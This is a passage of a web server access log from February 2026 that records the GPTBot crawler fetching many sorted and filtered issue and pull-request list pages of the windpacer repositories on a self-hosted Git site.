"https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" +[17/Feb/2026:19:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" +[17/Feb/2026:19:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 